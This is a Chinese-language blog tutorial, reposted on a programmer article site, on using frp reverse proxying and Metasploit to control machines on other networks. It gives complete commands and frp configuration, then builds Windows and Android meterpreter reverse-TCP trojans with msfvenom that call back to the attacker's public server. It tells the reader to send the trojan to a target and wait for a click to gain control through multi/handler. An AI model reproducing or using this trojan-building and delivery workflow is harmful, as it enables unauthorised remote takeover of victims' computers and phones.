欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

metasploit学习——frp反向代理、内网穿透、木马

程序员文章站 2022-03-24 08:34:52
...

环境准备

①申请云服务器(获取公网IP)
②公网服务器与内网服务器同时下载frp进行安装解压后主要关注4个文件,分别是frpcfrpc.inifrpsfrps.ini,前者两个文件(frpcfrpc.ini)是客户端(client)所关注文件,后者两个文件(frpsfrps.ini)是服务端(server)所关注两个文件环境配置(frp反向代理、内网穿透)

云主机:

#安装frp
wget https://github.com/fatedier/frp/releases/download/v0.16.1/frp_0.16.1_linux_amd64.tar.gz 
​
#解压frp
tar -zxvf frp_0.16.1_linux_amd64.tar.gz  
​
#进入frp解压目录
cd frp_0.16.1_linux_amd64
​
#查看frp_0.16.1_linux_amd64下的文件
ls
​
#编辑frps.ini文件
vi frps.ini
​
#frp服务端与客户端连接端口,frps和frpc必须一致;防火墙放行该端口,
bind_port=7000
​
#启动frps
./frps

kali配置:

#安装frp
wget https://github.com/fatedier/frp/releases/download/v0.16.1/frp_0.16.1_linux_amd64.tar.gz 
​
#解压frp
tar -zxvf frp_0.16.1_linux_amd64.tar.gz  
​
#进入frp解压目录
cd frp_0.16.1_linux_amd64
​
#查看frp_0.16.1_linux_amd64下的文件
ls
​
#编辑frpc.ini文件
vi frpc.ini
​
#修改内容:
[common]
server_addr = 你的云主机ip  #公网IP
server_port = 7000        #frpc工作端口,和之前的云服务端的bind_port设置保持一致
​
[ssh]
type = tcp              #连接协议
local_ip = 127.0.0.1    #内网服务器IP
local_port = 22         #ssh默认端口号
remote_port = 10086     #自定义端口号
​
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 4444     #msf默认监听端口为4444,转发给本机的4444端口,可自定义
remote_port = 2333    #服务端用该端口转发给本机,可自定义

木马程序制作

Windows

#LHOST:必须设置为你的公网IP
#LPORT:设置之前在frpc.ini的remote_port=2333
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的公网ip LPORT=2333 -f exe > /root/hacker.exe

Android

msfvenom -p android/meterpreter/reverse_tcp LHOST=你的公网ip LPORT=2333 R > /lol.apk

将制作好的木马发送给目标

发送完成后,kali中进行的步骤:

#进入msf
msfconsole
​
#进入监听模块
use exploit/multi/handler
​
#设置LHOST参数
set LHOST 127.0.0.1​
#设置LPORT参数
set LPORT 4444
​
#开始攻击
exploit

等待目标点击木马,点击后会进入meterpreter>,则表示成功呢获得目标的控制权,即可进行进一步测试

问答:
Q:什么是反向代理
A:引用一个很容易理解的答案(原文:https://blog.csdn.net/xinpz/article/details/82732217)
metasploit学习——frp反向代理、内网穿透、木马

Q:什么是内网穿透
A:实现不同局域网内的主机之间通过互联网进行通信

相关标签: metasploit